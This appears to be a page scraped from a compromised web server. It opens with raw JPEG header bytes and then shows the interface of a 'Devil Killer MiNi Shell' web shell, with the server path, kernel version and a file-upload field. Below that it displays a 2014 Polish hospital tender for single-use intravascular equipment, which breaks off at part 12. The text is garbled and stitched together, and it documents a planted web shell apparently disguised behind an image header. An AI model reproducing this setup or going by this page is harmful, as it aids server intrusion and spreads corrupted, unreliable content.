JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140625/136369-N-2014.html

<p class="kh_header"><b>Zielona Góra: Sukcesywne dostawy   sprzętu jednokrotnego użytku do procedur wewnątrznaczyniowych</b><br>
<b>Numer ogłoszenia: 136369 - 2014; data zamieszczenia: 25.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki  Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Zyty 26, 65-046 Zielona Góra, woj. lubuskie, tel. 068 3296200, faks 068 3255808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy   sprzętu jednokrotnego użytku do procedur wewnątrznaczyniowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  649 655,00   PLN ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy   sprzętu jednokrotnego użytku do procedur wewnątrznaczyniowych.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem   zamówień  uzupełniających do 20 % wartości zamówienia podstawowego są sukcesywne dostawy sprzętu jednokrotnego użytku do procedur wewnątrznaczyniowych w zakresie zadań od  nr 1 - 14 oraz nr 16.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1, 33.14.13.10-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed  upływem    terminu   składania   ofert   wykonawca    zobowiązany   jest   wnieść  wadium w wysokości   ustalonej  dla poszczególnego  zadania:

- zadanie nr   1 -       800,00 PLN
- zadanie nr   2 -    1 400,00 PLN  
- zadanie nr   3 -    1 000,00 PLN  
- zadanie nr   4 -    3 000,00 PLN
- zadanie nr   5 -       600,00 PLN  
- zadanie nr   6 -    1 100,00 PLN
- zadanie nr   7 -       600,00 PLN  
- zadanie nr   8 -       250,00 PLN 
- zadanie nr   9 -       150,00 PLN  
- zadanie nr  10 -       100,00 PLN  
- zadanie nr  11 -       150,00 PLN
- zadanie nr  12 -       450,00 PLN  
- zadanie nr  13 -       800,00 PLN
- zadanie nr  14 -       800,00 PLN  
- zadanie nr  15 -       250,00 PLN
- zadanie nr  16 -         30,00 PLN
- zadanie nr  17 -        100,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia - zadania lub zadań w zakresie posiadanej wiedzy i doświadczenia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium /spełnia - nie spełnia/ na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia - zadania lub zadań w zakresie dysponowania odpowiednim potencjałem technicznym. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia w zakresie dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia - zadania lub zadań w zakresie sytuacji ekonomicznej i finansowej. Ocenia spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: 1) oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu udostępniającego zasób dotyczący zdolności finansowej 2) opłacona polisa, a w przypadku jej braku inny właściwy dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - zadania na kwotę co najmniej:
- 20 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 1, nr 13, nr 14,
 -  35 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 2,
 -  25 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 3,
 -  70 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 4,
 - 15 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 5, nr 7,
 - 27 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 6, 
 - 6 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 8, nr 9,
 - 2 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 10, nr 17,
 - 3 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 11,
 -10 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 12,
 - 5 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 15,
 - 1 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 16.


UWAGI : W    przypadku     składania     oferty      obejmującej    więcej niż jedno zadanie wartość  przedmiotowego dokumentu powinna odpowiadać co najmniej  najwyższej, wartości     wymaganej  dla zadania ujętego w takiej ofercie.
Jeżeli  wykonawca przedkłada polisę z której wynika ,że  termin płatności,  pierwszej raty składki ubezpieczenia lub całości składki ubezpieczenia został odroczony i upływa po terminie składania ofert, to również ma obowiązek udokumentować fakt opłacenia  przed upływem terminu składania ofert przedmiotowej - odroczonej  pierwszej raty składki lub całości składki ubezpieczenia. Każda przedkładana polisa musi być opłacona.
Obowiązek, o którym mowa wyżej nie dotyczy kolejnych rat składki ubezpieczenia, których termin płatności jest odroczony i upływa po terminie składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony     dopuszczają    zmiany   postanowień zawartej umowy w stosunku do    treści  oferty, na    podstawie    której dokonano wyboru Wykonawcy w przypadku: 
    1) zmiany danych podmiotowych Wykonawcy (np. w wyniku przekształcenia,  przejęcia itp.),
    2) zmiany cen jednostkowych przedmiotu umowy w sytuacji okresowych promocji, bądź obniżenia ceny przez producenta w trakcie trwania umowy,
    3)  szczególnych okoliczności takich jak  zaprzestanie lub wstrzymanie  wytwarzania    wyrobów objętych umową, wygaśnięcia  świadectwa  ich  rejestracji albo  wycofania ze sprzedaży.
        W   powyższych     przypadkach   Strony     mogą    dopuścić    dostarczenie  odpowiedników o  parametrach   nie gorszych od  wyrobów objętych umową. Cena   dostarczonego     odpowiednika    nie   może   być wyższa   od ceny wyrobu zastąpionego.
    4)  konieczności    przesunięcia    terminów    umownych   jeżeli     konieczność   ta,    nastąpiła na skutek okoliczności, których nie można było przewidzieć w  chwili   zawierania    niniejszej umowy np. siły wyższej
    5)zmiany sposobu  konfekcjonowania i  wielkości jednostkowej wyrobu, którego   cena po odpowiednim przeliczeniu nie będzie wyższa niż cena wyrobu objętego umową.
UWAGA:
Pkt 5) dotyczy wyłącznie umowy w sprawie zamówienia dotyczącego realizacji zadań nr 12, nr 15, nr 16, nr 17</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.zgo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, budynek A - administracji, pok. 019, cena 12,00 PLN + koszty przekazania..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2014 godzina 10:00, miejsce: Siedziba zamawiającego, budynek A - administracji, pokój 201, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koszulki wprowadzające  krótkie i długie do kaniulacji tętnicy udowej i promieniowej oraz koszulki wprowadzające o bardzo dużej odporności na zagięcie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  47 000,00  PLN    ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy  koszulek wprowadzających  krótkich i długich do kaniulacji tętnicy udowej i promieniowej oraz koszulek wprowadzających o bardzo dużej odporności na zagięcie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadniki obwodowe, prowadniki  do rekanalizacji naczyń podudzia i tętnicy udowej powierzchownej oraz prowadniki  sztywne do dostępu 		  kontrlateralnego i prowadniki  naczyniowe hyfrofilne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  80 340,00   PLN   ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy prowadników obwodowych, prowadnikóch  do rekanalizacji naczyń podudzia i tętnicy udowej powierzchownej oraz prowadników  sztywnych do dostępu 		  kontrlateralnego i prowadników  naczyniowych hyfrofilnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cewniki angiograficzne diagnostyczne i mikrocewniki zabiegowe oraz cewniki balonowe niskoprofilowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  58 300,00   PLN   ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy cewników angiograficznych diagnostycznych i mikrocewników zabiegowych oraz cewników balonowych niskoprofilowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Stenty samorozprężalne do tętnic obwodowych krętych i ciasnych zwężeń oraz stenty samorozprężalne pokryte lekiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  171 360,00   PLN   ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy stentów samorozprężalnych do tętnic obwodowych krętych i ciasnych zwężeń oraz stentów samorozprężalnych pokrytych lekiem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Cewniki balonowe do PTA 0,018 OTW  oraz do PTA 0,014 OTW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  35 600,00   PLN   ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy cewników balonowych do PTA 0,018 OTW  oraz do PTA 0,014 OTW.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Stenty montowane na balonie do tętnic obwodowych o krętym przebiegu oraz stenty pokrywane lekiem antyproliferacyjnym  montowane na balonie do tętnic o małej średnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  64 000,00   PLN   ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy stentów montowanych na balonie do tętnic obwodowych o krętym przebiegu oraz stentów pokrywanych lekiem antyproliferacyjnym  montowanych na balonie do tętnic o małej średnicy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Koszulki wprowadzające długie o bardzo dużej odporności na zagięcie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  33 000,00   PLN   ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy koszulek wprowadzających długich o bardzo dużej odporności na zagięcie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Prowadniki 0,014 do rekanalizacji naczyń podudzia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  13 200,00   PLN   ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy prowadników 0,014 do rekanalizacji naczyń podudzia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Prowadniki do rekanalizacji tętnicy udowej powierzchownej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  7 900,00   PLN     ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy prowadników do rekanalizacji tętnicy udowej powierzchownej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Cewniki angiograficzne diagnostyczne do wybiórczego kontrastowania naczyń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  4 500,00   PLN     ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy cewników angiograficznych diagnostycznych do wybiórczego kontrastowania naczyń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Cewniki angiograficzne zabiegowe do wybiórczego kontrastowania naczyń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości    szacunkowej  7 680,00   PLN     ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy cewników angiograficznych zabiegowych do wybiórczego kontrastowania naczyń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.17.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Strzykawki wysokociśnieniowe z manometrem oraz strzykawki z igłą z gwintem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia  o   łącznej  wartości   szacunkowej  22 850,00   PLN     ( zamówienie podstawowe  i uzupełniające)  są  sukcesywne dostawy strzykawek wysokociśnieniowych z manometrem oraz strzykawek z igłą z gwintem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
